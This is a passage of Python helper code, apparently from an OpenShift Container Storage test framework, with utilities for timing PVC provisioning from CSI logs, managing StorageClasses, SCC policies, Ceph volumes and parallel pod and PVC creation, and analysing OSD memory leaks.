status = ocp_obj.exec_oc_cmd(command)
return status
def get_worker_nodes():
"""
Fetches all worker nodes.
Returns:
list: List of names of worker nodes
"""
label = 'node-role.kubernetes.io/worker'
ocp_node_obj = ocp.OCP(kind=constants.NODE)
nodes = ocp_node_obj.get(selector=label).get('items')
worker_nodes_list = [node.get('metadata').get('name') for node in nodes]
return worker_nodes_list
def get_master_nodes():
"""
Fetches all master nodes.
Returns:
list: List of names of master nodes
"""
label = 'node-role.kubernetes.io/master'
ocp_node_obj = ocp.OCP(kind=constants.NODE)
nodes = ocp_node_obj.get(selector=label).get('items')
master_nodes_list = [node.get('metadata').get('name') for node in nodes]
return master_nodes_list
def get_provision_time(interface, pvc_name, status='start'):
"""
Get the starting/ending creation time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str / list): Name of the PVC(s) for creation time
the list will be list of pvc objects
status (str): the status that we want to get - Start / End
Returns:
datetime object: Time of PVC(s) creation
"""
# Define the status that need to retrieve
operation = 'started'
if status.lower() == 'end':
operation = 'succeeded'
format = '%H:%M:%S.%f'
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], 'csi-provisioner')
logs += pod.get_pod_logs(pod_name[1], 'csi-provisioner')
logs = logs.split("\n")
# Extract the time for the one PVC provisioning
if isinstance(pvc_name, str):
stat = [
i for i in logs if re.search(f"provision.*{pvc_name}.*{operation}", i)
]
stat = stat[0].split(' ')[1]
# Extract the time for the list of PVCs provisioning
if isinstance(pvc_name, list):
all_stats = []
for pv_name in pvc_name:
name = pv_name.name
stat = [
i for i in logs if re.search(f"provision.*{name}.*{operation}", i)
]
stat = stat[0].split(' ')[1]
all_stats.append(stat)
all_stats = sorted(all_stats)
if status.lower() == 'end':
stat = all_stats[-1] # return the highest time
elif status.lower() == 'start':
stat = all_stats[0] # return the lowest time
return datetime.datetime.strptime(stat, format)
def get_start_creation_time(interface, pvc_name):
"""
Get the starting creation time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for creation time measurement
Returns:
datetime object: Start time of PVC creation
"""
format = '%H:%M:%S.%f'
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], 'csi-provisioner')
logs += pod.get_pod_logs(pod_name[1], 'csi-provisioner')
logs = logs.split("\n")
# Extract the starting time for the PVC provisioning
start = [
i for i in logs if re.search(f"provision.*{pvc_name}.*started", i)
]
start = start[0].split(' ')[1]
return datetime.datetime.strptime(start, format)
def get_end_creation_time(interface, pvc_name):
"""
Get the ending creation time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for creation time measurement
Returns:
datetime object: End time of PVC creation
"""
format = '%H:%M:%S.%f'
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], 'csi-provisioner')
logs += pod.get_pod_logs(pod_name[1], 'csi-provisioner')
logs = logs.split("\n")
# Extract the starting time for the PVC provisioning
end = [
i for i in logs if re.search(f"provision.*{pvc_name}.*succeeded", i)
]
end = end[0].split(' ')[1]
return datetime.datetime.strptime(end, format)
def measure_pvc_creation_time(interface, pvc_name):
"""
Measure PVC creation time based on logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for creation time measurement
Returns:
float: Creation time for the PVC
"""
start = get_start_creation_time(interface=interface, pvc_name=pvc_name)
end = get_end_creation_time(interface=interface, pvc_name=pvc_name)
total = end - start
return total.total_seconds()
def measure_pvc_creation_time_bulk(interface, pvc_name_list, wait_time=60):
"""
Measure PVC creation time of bulk PVC based on logs.
Args:
interface (str): The interface backed the PVC
pvc_name_list (list): List of PVC Names for measuring creation time
wait_time (int): Seconds to wait before collecting CSI log
Returns:
pvc_dict (dict): Dictionary of pvc_name with creation time.
"""
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# due to some delay in CSI log generation added wait
time.sleep(wait_time)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], 'csi-provisioner')
logs += pod.get_pod_logs(pod_name[1], 'csi-provisioner')
logs = logs.split("\n")
pvc_dict = dict()
format = '%H:%M:%S.%f'
for pvc_name in pvc_name_list:
# Extract the starting time for the PVC provisioning
start = [
i for i in logs if re.search(f"provision.*{pvc_name}.*started", i)
]
start = start[0].split(' ')[1]
start_time = datetime.datetime.strptime(start, format)
# Extract the end time for the PVC provisioning
end = [
i for i in logs if re.search(f"provision.*{pvc_name}.*succeeded", i)
]
end = end[0].split(' ')[1]
end_time = datetime.datetime.strptime(end, format)
total = end_time - start_time
pvc_dict[pvc_name] = total.total_seconds()
return pvc_dict
def measure_pv_deletion_time_bulk(interface, pv_name_list, wait_time=60):
"""
Measure PV deletion time of bulk PV, based on logs.
Args:
interface (str): The interface backed the PV
pv_name_list (list): List of PV Names for measuring deletion time
wait_time (int): Seconds to wait before collecting CSI log
Returns:
pv_dict (dict): Dictionary of pv_name with deletion time.
"""
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# due to some delay in CSI log generation added wait
time.sleep(wait_time)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], 'csi-provisioner')
logs += pod.get_pod_logs(pod_name[1], 'csi-provisioner')
logs = logs.split("\n")
pv_dict = dict()
format = '%H:%M:%S.%f'
for pv_name in pv_name_list:
# Extract the deletion start time for the PV
start = [
i for i in logs if re.search(f"delete \"{pv_name}\": started", i)
]
start = start[0].split(' ')[1]
start_time = datetime.datetime.strptime(start, format)
# Extract the deletion end time for the PV
end = [
i for i in logs if re.search(f"delete \"{pv_name}\": succeeded", i)
]
end = end[0].split(' ')[1]
end_time = datetime.datetime.strptime(end, format)
total = end_time - start_time
pv_dict[pv_name] = total.total_seconds()
return pv_dict
def get_start_deletion_time(interface, pv_name):
"""
Get the starting deletion time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for deletion time measurement
Returns:
datetime object: Start time of PVC deletion
"""
format = '%H:%M:%S.%f'
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], 'csi-provisioner')
logs += pod.get_pod_logs(pod_name[1], 'csi-provisioner')
logs = logs.split("\n")
# Extract the starting time for the PVC deletion
start = [
i for i in logs if re.search(f"delete \"{pv_name}\": started", i)
]
start = start[0].split(' ')[1]
return datetime.datetime.strptime(start, format)
def get_end_deletion_time(interface, pv_name):
"""
Get the ending deletion time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pv_name (str): Name of the PVC for deletion time measurement
Returns:
datetime object: End time of PVC deletion
"""
format = '%H:%M:%S.%f'
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], 'csi-provisioner')
logs += pod.get_pod_logs(pod_name[1], 'csi-provisioner')
logs = logs.split("\n")
# Extract the starting time for the PV deletion
end = [
i for i in logs if re.search(f"delete \"{pv_name}\": succeeded", i)
]
end = end[0].split(' ')[1]
return datetime.datetime.strptime(end, format)
def measure_pvc_deletion_time(interface, pv_name):
"""
Measure PVC deletion time based on logs
Args:
interface (str): The interface backed the PVC
pv_name (str): Name of the PV for creation time measurement
Returns:
float: Deletion time for the PVC
"""
start = get_start_deletion_time(interface=interface, pv_name=pv_name)
end = get_end_deletion_time(interface=interface, pv_name=pv_name)
total = end - start
return total.total_seconds()
def pod_start_time(pod_obj):
"""
Function to measure time taken for container(s) to get into running state
by measuring the difference between container's start time (when container
went into running state) and started time (when container was actually
started)
Args:
pod_obj(obj): pod object to measure start time
Returns:
containers_start_time(dict):
Returns the name and start time of container(s) in a pod
"""
time_format = '%Y-%m-%dT%H:%M:%SZ'
containers_start_time = {}
start_time = pod_obj.data['status']['startTime']
start_time = datetime.datetime.strptime(start_time, time_format)
for container in range(len(pod_obj.data['status']['containerStatuses'])):
started_time = pod_obj.data[
'status']['containerStatuses'][container]['state'][
'running']['startedAt']
started_time = datetime.datetime.strptime(started_time, time_format)
container_name = pod_obj.data[
'status']['containerStatuses'][container]['name']
container_start_time = (started_time - start_time).seconds
containers_start_time[container_name] = container_start_time
return containers_start_time
def get_default_storage_class():
"""
Get the default StorageClass(es)
Returns:
list: default StorageClass(es) list
"""
default_sc_obj = ocp.OCP(kind='StorageClass')
storage_classes = default_sc_obj.get().get('items')
storage_classes = [
sc for sc in storage_classes if 'annotations' in sc.get('metadata')
]
return [
sc.get('metadata').get('name') for sc in storage_classes if sc.get(
'metadata'
).get('annotations').get(
'storageclass.kubernetes.io/is-default-class'
) == 'true'
]
def change_default_storageclass(scname):
"""
Change the default StorageClass to the given SC name
Args:
scname (str): StorageClass name
Returns:
bool: True on success
"""
default_sc = get_default_storage_class()
ocp_obj = ocp.OCP(kind='StorageClass')
if default_sc:
# Change the existing default Storageclass annotation to false
patch = " '{\"metadata\": {\"annotations\":" \
"{\"storageclass.kubernetes.io/is-default-class\"" \
":\"false\"}}}' "
patch_cmd = f"patch storageclass {default_sc} -p" + patch
ocp_obj.exec_oc_cmd(command=patch_cmd)
# Change the new storageclass to default
patch = " '{\"metadata\": {\"annotations\":" \
"{\"storageclass.kubernetes.io/is-default-class\"" \
":\"true\"}}}' "
patch_cmd = f"patch storageclass {scname} -p" + patch
ocp_obj.exec_oc_cmd(command=patch_cmd)
return True
def is_volume_present_in_backend(interface, image_uuid, pool_name=None):
"""
Check whether Image/Subvolume is present in the backend.
Args:
interface (str): The interface backed the PVC
image_uuid (str): Part of VolID which represents
corresponding image/subvolume in backend
eg: oc get pv/<volumeName> -o jsonpath='{.spec.csi.volumeHandle}'
Output is the CSI generated VolID and looks like:
'0001-000c-rook-cluster-0000000000000001-
f301898c-a192-11e9-852a-1eeeb6975c91' where
image_uuid is 'f301898c-a192-11e9-852a-1eeeb6975c91'
pool_name (str): Name of the rbd-pool if interface is CephBlockPool
Returns:
bool: True if volume is present and False if volume is not present
"""
ct_pod = pod.get_ceph_tools_pod()
if interface == constants.CEPHBLOCKPOOL:
valid_error = [f"error opening image csi-vol-{image_uuid}"]
cmd = f"rbd info -p {pool_name} csi-vol-{image_uuid}"
if interface == constants.CEPHFILESYSTEM:
valid_error = [
f"Subvolume 'csi-vol-{image_uuid}' not found",
f"subvolume 'csi-vol-{image_uuid}' does not exist"
]
cmd = (
f"ceph fs subvolume getpath {get_cephfs_name()}"
f" csi-vol-{image_uuid} csi"
)
try:
ct_pod.exec_ceph_cmd(ceph_cmd=cmd, format='json')
logger.info(
f"Verified: Volume corresponding to uuid {image_uuid} exists "
f"in backend"
)
return True
except CommandFailed as ecf:
assert any([error in str(ecf) for error in valid_error]), (
f"Error occurred while verifying volume is present in backend: "
f"{str(ecf)} ImageUUID: {image_uuid}. Interface type: {interface}"
)
logger.info(
f"Volume corresponding to uuid {image_uuid} does not exist "
f"in backend"
)
return False
def verify_volume_deleted_in_backend(
interface, image_uuid, pool_name=None, timeout=180
):
"""
Ensure that Image/Subvolume is deleted in the backend.
Args:
interface (str): The interface backed the PVC
image_uuid (str): Part of VolID which represents
corresponding image/subvolume in backend
eg: oc get pv/<volumeName> -o jsonpath='{.spec.csi.volumeHandle}'
Output is the CSI generated VolID and looks like:
'0001-000c-rook-cluster-0000000000000001-
f301898c-a192-11e9-852a-1eeeb6975c91' where
image_uuid is 'f301898c-a192-11e9-852a-1eeeb6975c91'
pool_name (str): Name of the rbd-pool if interface is CephBlockPool
timeout (int): Wait time for the volume to be deleted.
Returns:
bool: True if volume is deleted before timeout.
False if volume is not deleted.
"""
try:
for ret in TimeoutSampler(
timeout, 2, is_volume_present_in_backend, interface=interface,
image_uuid=image_uuid, pool_name=pool_name
):
if not ret:
break
logger.info(
f"Verified: Volume corresponding to uuid {image_uuid} is deleted "
f"in backend"
)
return True
except TimeoutExpiredError:
logger.error(
f"Volume corresponding to uuid {image_uuid} is not deleted "
f"in backend"
)
# Log 'ceph progress' and 'ceph rbd task list' for debugging purpose
ct_pod = pod.get_ceph_tools_pod()
ct_pod.exec_ceph_cmd('ceph progress json', format=None)
ct_pod.exec_ceph_cmd('ceph rbd task list')
return False
def create_serviceaccount(namespace):
"""
Create a Serviceaccount
Args:
namespace (str): The namespace for the serviceaccount creation
Returns:
OCS: An OCS instance for the service_account
"""
service_account_data = templating.load_yaml(
constants.SERVICE_ACCOUNT_YAML
)
service_account_data['metadata']['name'] = create_unique_resource_name(
'sa', 'serviceaccount'
)
service_account_data['metadata']['namespace'] = namespace
return create_resource(**service_account_data)
def get_serviceaccount_obj(sa_name, namespace):
"""
Get serviceaccount obj
Args:
sa_name (str): Service Account name
namespace (str): The namespace for the serviceaccount creation
Returns:
OCS: An OCS instance for the service_account
"""
ocp_sa_obj = ocp.OCP(kind=constants.SERVICE_ACCOUNT, namespace=namespace)
try:
sa_dict = ocp_sa_obj.get(resource_name=sa_name)
return OCS(**sa_dict)
except CommandFailed:
logger.error("ServiceAccount not found in specified namespace")
def validate_scc_policy(sa_name, namespace):
"""
Validate serviceaccount is added to scc of privileged
Args:
sa_name (str): Service Account name
namespace (str): The namespace for the serviceaccount creation
Returns:
bool: True if sc_name is present in scc of privileged else False
"""
sa_name = f"system:serviceaccount:{namespace}:{sa_name}"
logger.info(sa_name)
ocp_scc_obj = ocp.OCP(kind=constants.SCC, namespace=namespace)
scc_dict = ocp_scc_obj.get(resource_name=constants.PRIVILEGED)
scc_users_list = scc_dict.get('users')
for scc_user in scc_users_list:
if scc_user == sa_name:
return True
return False
def add_scc_policy(sa_name, namespace):
"""
Adding ServiceAccount to scc privileged
Args:
sa_name (str): ServiceAccount name
namespace (str): The namespace for the scc_policy creation
"""
ocp = OCP()
out = ocp.exec_oc_cmd(
command=f"adm policy add-scc-to-user privileged system:serviceaccount:{namespace}:{sa_name}",
out_yaml_format=False
)
logger.info(out)
def remove_scc_policy(sa_name, namespace):
"""
Removing ServiceAccount from scc privileged
Args:
sa_name (str): ServiceAccount name
namespace (str): The namespace for the scc_policy deletion
"""
ocp = OCP()
out = ocp.exec_oc_cmd(
command=f"adm policy remove-scc-from-user privileged system:serviceaccount:{namespace}:{sa_name}",
out_yaml_format=False
)
logger.info(out)
def craft_s3_command(cmd, mcg_obj=None, api=False):
"""
Crafts the AWS CLI S3 command including the
login credentials and command to be ran
Args:
mcg_obj: An MCG object containing the MCG S3 connection credentials
cmd: The AWSCLI command to run
api: True if the call is for s3api, false if s3
Returns:
str: The crafted command, ready to be executed on the pod
"""
api = 'api' if api else ''
if mcg_obj:
base_command = (
f'sh -c "AWS_CA_BUNDLE={constants.SERVICE_CA_CRT_AWSCLI_PATH} '
f'AWS_ACCESS_KEY_ID={mcg_obj.access_key_id} '
f'AWS_SECRET_ACCESS_KEY={mcg_obj.access_key} '
f'AWS_DEFAULT_REGION={mcg_obj.region} '
f'aws s3{api} '
f'--endpoint={mcg_obj.s3_internal_endpoint} '
)
string_wrapper = '"'
else:
base_command = (
f"aws s3{api} --no-sign-request "
)
string_wrapper = ''
return f"{base_command}{cmd}{string_wrapper}"
def wait_for_resource_count_change(
func_to_use, previous_num, namespace, change_type='increase',
min_difference=1, timeout=20, interval=2, **func_kwargs
):
"""
Wait for a change in total count of PVC or pod
Args:
func_to_use (function): Function to be used to fetch resource info
Supported functions: pod.get_all_pvcs(), pod.get_all_pods()
previous_num (int): Previous number of pods/PVCs for comparison
namespace (str): Name of the namespace
change_type (str): Type of change to check. Accepted values are
'increase' and 'decrease'. Default is 'increase'.
min_difference (int): Minimum required difference in PVC/pod count
timeout (int): Maximum wait time in seconds
interval (int): Time in seconds to wait between consecutive checks
Returns:
True if difference in count is greater than or equal to
'min_difference'. False in case of timeout.
"""
try:
for sample in TimeoutSampler(
timeout, interval, func_to_use, namespace, **func_kwargs
):
if func_to_use == pod.get_all_pods:
current_num = len(sample)
else:
current_num = len(sample['items'])
if change_type == 'increase':
count_diff = current_num - previous_num
else:
count_diff = previous_num - current_num
if count_diff >= min_difference:
return True
except TimeoutExpiredError:
return False
def verify_pv_mounted_on_node(node_pv_dict):
"""
Check if mount point of a PV exists on a node
Args:
node_pv_dict (dict): Node to PV list mapping
eg: {'node1': ['pv1', 'pv2', 'pv3'], 'node2': ['pv4', 'pv5']}
Returns:
dict: Node to existing PV list mapping
eg: {'node1': ['pv1', 'pv3'], 'node2': ['pv5']}
"""
existing_pvs = {}
for node_name, pvs in node_pv_dict.items():
cmd = f'oc debug nodes/{node_name} -- df'
df_on_node = run_cmd(cmd)
existing_pvs[node_name] = []
for pv_name in pvs:
if f"/pv/{pv_name}/" in df_on_node:
existing_pvs[node_name].append(pv_name)
return existing_pvs
def converge_lists(list_to_converge):
"""
Function to flatten and remove the sublist created during future obj
Args:
list_to_converge (list): arg list of lists, eg: [[1,2],[3,4]]
Returns:
list (list): return converged list eg: [1,2,3,4]
"""
return [item for sublist in list_to_converge for item in sublist]
def create_multiple_pvc_parallel(
sc_obj, namespace, number_of_pvc, size, access_modes
):
"""
Funtion to create multiple PVC in parallel using threads
Function will create PVCs based on the available access modes
Args:
sc_obj (str): Storage Class object
namespace (str): The namespace for creating pvc
number_of_pvc (int): NUmber of pvc to be created
size (str): size of the pvc eg: '10Gi'
access_modes (list): List of access modes for PVC creation
Returns:
pvc_objs_list (list): List of pvc objs created in function
"""
obj_status_list, result_lists = ([] for i in range(2))
with ThreadPoolExecutor() as executor:
for mode in access_modes:
result_lists.append(
executor.submit(
create_multiple_pvcs, sc_name=sc_obj.name,
namespace=namespace, number_of_pvc=number_of_pvc,
access_mode=mode, size=size)
)
result_list = [result.result() for result in result_lists]
pvc_objs_list = converge_lists(result_list)
# Check for all the pvcs in Bound state
with ThreadPoolExecutor() as executor:
for objs in pvc_objs_list:
obj_status_list.append(
executor.submit(wait_for_resource_state, objs, 'Bound', 90)
)
if False in [obj.result() for obj in obj_status_list]:
raise TimeoutExpiredError
return pvc_objs_list
def create_pods_parallel(
pvc_list, namespace, interface, pod_dict_path=None, sa_name=None, raw_block_pv=False,
dc_deployment=False, node_selector=None
):
"""
Function to create pods in parallel
Args:
pvc_list (list): List of pvcs to be attached in pods
namespace (str): The namespace for creating pod
interface (str): The interface backed the PVC
pod_dict_path (str): pod_dict_path for yaml
sa_name (str): sa_name for providing permission
raw_block_pv (bool): Either RAW block or not
dc_deployment (bool): Either DC deployment or not
node_selector (dict): dict of key-value pair to be used for nodeSelector field
eg: {'nodetype': 'app-pod'}
Returns:
pod_objs (list): Returns list of pods created
"""
future_pod_objs = []
# Added 300 sec wait time since in scale test once the setup has more
# PODs time taken for the pod to be up will be based on resource available
wait_time = 300
if raw_block_pv and not pod_dict_path:
pod_dict_path = constants.CSI_RBD_RAW_BLOCK_POD_YAML
with ThreadPoolExecutor() as executor:
for pvc_obj in pvc_list:
future_pod_objs.append(executor.submit(
create_pod, interface_type=interface,
pvc_name=pvc_obj.name, do_reload=False, namespace=namespace,
raw_block_pv=raw_block_pv, pod_dict_path=pod_dict_path,
sa_name=sa_name, dc_deployment=dc_deployment, node_selector=node_selector
))
pod_objs = [pvc_obj.result() for pvc_obj in future_pod_objs]
# Check for all the pods are in Running state
# In above pod creation not waiting for the pod to be created because of threads usage
with ThreadPoolExecutor() as executor:
for obj in pod_objs:
future_pod_objs.append(
executor.submit(wait_for_resource_state, obj, 'Running', timeout=wait_time)
)
# If pods not up raise exception/failure
if False in [obj.result() for obj in future_pod_objs]:
raise TimeoutExpiredError
return pod_objs
def delete_objs_parallel(obj_list):
"""
Function to delete objs specified in list
Args:
obj_list(list): List can be obj of pod, pvc, etc
Returns:
bool: True if obj deleted else False
"""
threads = list()
for obj in obj_list:
process = threading.Thread(target=obj.delete)
process.start()
threads.append(process)
for process in threads:
process.join()
return True
def memory_leak_analysis(median_dict):
"""
Function to analyse Memory leak after execution of test case
Memory leak is analyzed based on top output "RES" value of ceph-osd daemon,
i.e. list[7] in code
Args:
median_dict (dict): dict of worker nodes and respective median value
eg: median_dict = {'worker_node_1':102400, 'worker_node_2':204800, ...}
More Detail on Median value:
For calculating memory leak require a constant value, which should not be
start or end of test, so calculating it by getting memory for 180 sec
before TC execution and take a median out of it.
Memory value could be different for each nodes, so identify constant value
for each node and update in median_dict
Usage:
test_case(.., memory_leak_function):
.....
median_dict = helpers.get_memory_leak_median_value()
.....
TC execution part, memory_leak_fun will capture data
....
helpers.memory_leak_analysis(median_dict)
....
"""
# dict to store memory leak difference for each worker
diff = {}
for worker in get_worker_nodes():
memory_leak_data = []
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
with open(f"/tmp/{worker}-top-output.txt", "r") as f:
data = f.readline()
list = data.split(" ")
list = [i for i in list if i]
memory_leak_data.append(list[7])
else:
logging.info(f"worker {worker} memory leak file not found")
raise UnexpectedBehaviour
number_of_lines = len(memory_leak_data) - 1
# Get the start value form median_dict arg for respective worker
start_value = median_dict[f"{worker}"]
end_value = memory_leak_data[number_of_lines]
logging.info(f"Median value {start_value}")
logging.info(f"End value {end_value}")
# Convert the values to kb for calculations
if start_value.__contains__('g'):
start_value = float(1024 ** 2 * float(start_value[:-1]))
elif start_value.__contains__('m'):
start_value = float(1024 * float(start_value[:-1]))
else:
start_value = float(start_value)
if end_value.__contains__('g'):
end_value = float(1024 ** 2 * float(end_value[:-1]))
elif end_value.__contains__('m'):
end_value = float(1024 * float(end_value[:-1]))
else:
end_value = float(end_value)
# Calculate the percentage of diff between start and end value
# Based on value decide TC pass or fail
diff[worker] = ((end_value - start_value) / start_value) * 100
logging.info(f"Percentage diff in start and end value {diff[worker]}")
if diff[worker] <= 20:
logging.info(f"No memory leak in worker {worker} passing the test")
else:
logging.info(f"There is a memory leak in worker {worker}")
logging.info(f"Memory median value start of the test {start_value}")
logging.info(f"Memory value end of the test {end_value}")
raise UnexpectedBehaviour
def get_memory_leak_median_value():
"""
Function to calculate memory leak Median value by collecting the data for 180 sec
and find the median value which will be considered as starting point
to evaluate memory leak using "RES" value of ceph-osd daemon i.e. list[7] in code
Returns:
median_dict (dict): dict of worker nodes and respective median value
"""
median_dict = {}
timeout = 180 # wait for 180 sec to evaluate memory leak median data.
logger.info(f"waiting for {timeout} sec to evaluate the median value")
time.sleep(timeout)
for worker in get_worker_nodes():
memory_leak_data = []
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
with open(f"/tmp/{worker}-top-output.txt", "r") as f:
data = f.readline()
list = data.split(" ")
list = [i for i in list if i]
memory_leak_data.append(list[7])
else:
logging.info(f"worker {worker} memory leak file not found")
raise UnexpectedBehaviour
median_dict[f"{worker}"] = statistics.median(memory_leak_data)
return median_dict
def refresh_oc_login_connection(user=None, password=None):
"""
Function to refresh oc user login
Default login using kubeadmin user and password
Args:
user (str): Username to login
password (str): Password to login
"""
user = user or config.RUN['username']
if not password:
filename = os.path.join(
config.ENV_DATA['cluster_path'],
config.RUN['password_location']
)
with open(filename) as f:
password = f.read()
ocs_obj = ocp.OCP()
ocs_obj.login(user=user, password=password)
def rsync_kubeconf_to_node(node):
"""
Function to copy kubeconfig to OCP node
Args:
node (str): OCP node to copy kubeconfig if not present
"""
# ocp_obj = ocp.OCP()
filename = os.path.join(
config.ENV_DATA['cluster_path'],
config.RUN['kubeconfig_location']
)
file_path = os.path.dirname(filename)
master_list = get_master_nodes()
ocp_obj = ocp.OCP()
check_auth = 'auth'
check_conf = 'kubeconfig'
node_path = '/home/core/'
if check_auth not in ocp_obj.exec_oc_debug_cmd(node=master_list[0], cmd_list=[f"ls {node_path}"]):
ocp.rsync(
src=file_path, dst=f"{node_path}", node=node, dst_node=True
)
elif check_conf not in ocp_obj.exec_oc_debug_cmd(node=master_list[0], cmd_list=[f"ls {node_path}auth"]):
ocp.rsync(
src=file_path, dst=f"{node_path}", node=node, dst_node=True
)
def create_dummy_osd(deployment):
"""
Replace one of OSD pods with pod that contains all data from original
OSD but doesn't run osd daemon. This can be used e.g. for direct acccess
to Ceph Placement Groups.
Args:
deployment (str): Name of deployment to use
Returns:
list: first item is dummy deployment object, second item is dummy pod
object
"""
oc = OCP(
kind=constants.DEPLOYMENT,
namespace=config.ENV_DATA.get('cluster_namespace')
)
osd_data = oc.get(deployment)
dummy_deployment = create_unique_resource_name('dummy', 'osd')
osd_data['metadata']['name'] = dummy_deployment
osd_containers = osd_data.get('spec').get('template').get('spec').get(
'containers'
)
# get osd container spec
original_osd_args = osd_containers[0].get('args')
osd_data['spec']['template']['spec']['containers'][0]['args'] = []
osd_data['spec']['template']['spec']['containers'][0]['command'] = [
'/bin/bash',
'-c',
'sleep infinity'
]
osd_file = tempfile.NamedTemporaryFile(
mode='w+', prefix=dummy_deployment, delete=False
)
with open(osd_file.name, "w") as temp:
yaml.dump(osd_data, temp)
oc.create(osd_file.name)
# downscale the original deployment and start dummy deployment instead
oc.exec_oc_cmd(f"scale --replicas=0 deployment/{deployment}")
oc.exec_oc_cmd(f"scale --replicas=1 deployment/{dummy_deployment}")
osd_list = pod.get_osd_pods()
dummy_pod = [pod for pod in osd_list if dummy_deployment in pod.name][0]
wait_for_resource_state(
resource=dummy_pod,
state=constants.STATUS_RUNNING,
timeout=60
)
ceph_init_cmd = '/rook/tini' + ' ' + ' '.join(original_osd_args)
try:
logger.info('Following command should expire after 7 seconds')
dummy_pod.exec_cmd_on_pod(ceph_init_cmd, timeout=7)
except TimeoutExpired:
logger.info('Killing /rook/tini process')
try:
dummy_pod.exec_sh_cmd_on_pod(
"kill $(ps aux | grep '[/]rook/tini' | awk '{print $2}')"
)
except CommandFailed:
pass
return dummy_deployment, dummy_pod
def get_failure_domin():
"""
Function is used to getting failure domain of pool
Returns:
str: Failure domain from cephblockpool
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd(ceph_cmd="ceph osd crush rule dump", format='json')
assert out, "Failed to get cmd output"
for crush_rule in out:
if constants.CEPHBLOCKPOOL.lower() in crush_rule.get("rule_name"):
for steps in crush_rule.get("steps"):
if "type" in steps:
return steps.get("type")
def wait_for_ct_pod_recovery():
"""
In case the of node failures scenarios, in which the selected node is
running the ceph tools pod, we'll want to wait for the pod recovery
Returns:
bool: True in case the ceph tools pod was recovered, False otherwise
"""
try:
_ = get_admin_key()
except CommandFailed as ex:
logger.info(str(ex))
if "connection timed out" in str(ex):
logger.info(
"Ceph tools box was running on the node that had a failure. "
"Hence, waiting for a new Ceph tools box pod to spin up"
)
wait_for_resource_count_change(
func_to_use=pod.get_all_pods, previous_num=1,
namespace=config.ENV_DATA['cluster_namespace'], timeout=120,
selector=constants.TOOL_APP_LABEL
)
return True
else:
return False
return True
def label_worker_node(node_list, label_key, label_value):
"""
Function to label worker node for running app pods on specific worker nodes.
Args:
node_list (list): List of node name
label_key (str): Label_key to be added in worker
label_value (str): Label_value
"""
ocp_obj = OCP()
out = ocp_obj.exec_oc_cmd(
command=f"label node {' '.join(node_list)} {label_key}={label_value}", out_yaml_format=False
)
logger.info(out)
def remove_label_from_worker_node(node_list, label_key):
"""
Function to remove label from worker node.
Args:
node_list (list): List of node name
label_key (str): Label_key to be remove from worker node
"""
ocp_obj = OCP()
out = ocp_obj.exec_oc_cmd(
command=f"label node {' '.join(node_list)} {label_key}-", out_yaml_format=False
)
logger.info(out)
def get_pods_nodes_logs():
"""
Get logs from all pods and nodes
Returns:
dict: node/pod name as key, logs content as value (string)
"""
all_logs = {}
all_pods = pod.get_all_pods()
all_nodes = node.get_node_objs()
for node_obj in all_nodes:
node_name = node_obj.name
log_content = node.get_node_logs(node_name)
all_logs.update({node_name: log_content})
for pod_obj in all_pods:
try:
pod_name = pod_obj.name
log_content = pod.get_pod_logs(pod_name)
all_logs.update({pod_name: log_content})
except CommandFailed:
pass
return all_logs
def get_logs_with_errors(errors=None):
"""
From logs of all pods and nodes, get only logs
containing any of specified errors
Args:
errors (list): List of errors to look for
Returns:
dict: node/pod name as key, logs content as value; may be empty
"""
all_logs = get_pods_nodes_logs()
output_logs = {}
errors_list = constants.CRITICAL_ERRORS
if errors:
errors_list = errors_list + errors
for name, log_content in all_logs.items():
for error_msg in errors_list:
if error_msg in log_content:
logger.debug(f"Found '{error_msg}' in log of {name}")
output_logs.update({name: log_content})
log_path = f"{ocsci_log_path()}/{name}.log"
with open(log_path, 'w') as fh:
fh.write(log_content)
return output_logs
def modify_osd_replica_count(resource_name, replica_count):
"""
Function to modify osd replica count to 0 or 1
Args:
resource_name (str): Name of osd i.e, 'rook-ceph-osd-0-c9c4bc7c-bkf4b'
replica_count (int): osd replica count to be changed to
Returns:
bool: True in case if changes are applied. False otherwise
"""
ocp_obj = ocp.OCP(kind=constants.DEPLOYMENT, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
params = f'{{"spec": {{"replicas": {replica_count}}}}}'
resource_name = '-'.join(resource_name.split('-')[0:4])
return ocp_obj.patch(resource_name=resource_name, params=params)
def collect_performance_stats(dir_name):
"""
Collect performance stats and saves them in file in json format.
dir_name (str): directory name to store stats.
Performance stats include:
IOPs and throughput percentage of cluster
CPU, memory consumption of each nodes
"""
from ocs_ci.ocs.cluster import CephCluster
log_dir_path = os.path.join(
os.path.expanduser(config.RUN['log_dir']),
f"failed_testcase_ocs_logs_{config.RUN['run_id']}",
f"{dir_name}_performance_stats"
)
if not os.path.exists(log_dir_path):
logger.info(f'Creating directory {log_dir_path}')
os.makedirs(log_dir_path)
performance_stats = {}
external = config.DEPLOYMENT['external_mode']
if external:
